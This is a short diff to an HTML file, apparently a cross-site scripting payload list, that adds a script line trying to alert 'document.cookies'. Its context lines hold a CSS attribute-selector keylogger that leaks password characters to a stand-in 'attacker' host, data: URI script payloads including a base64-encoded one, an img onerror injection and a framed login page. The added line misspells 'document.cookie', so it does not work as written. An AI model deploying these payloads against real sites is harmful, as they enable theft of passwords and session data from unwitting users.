--- a/rana.html
+++ b/rana.html
@@ -7,5 +7,6 @@
 <style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=”login.asp”/> 
 data:text/html,<script>alert(0)</script> data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
 <img  src="x:?  title="  onerror=alert(1)//"> 
+<script>alert(document.cookies);</script>
 
 
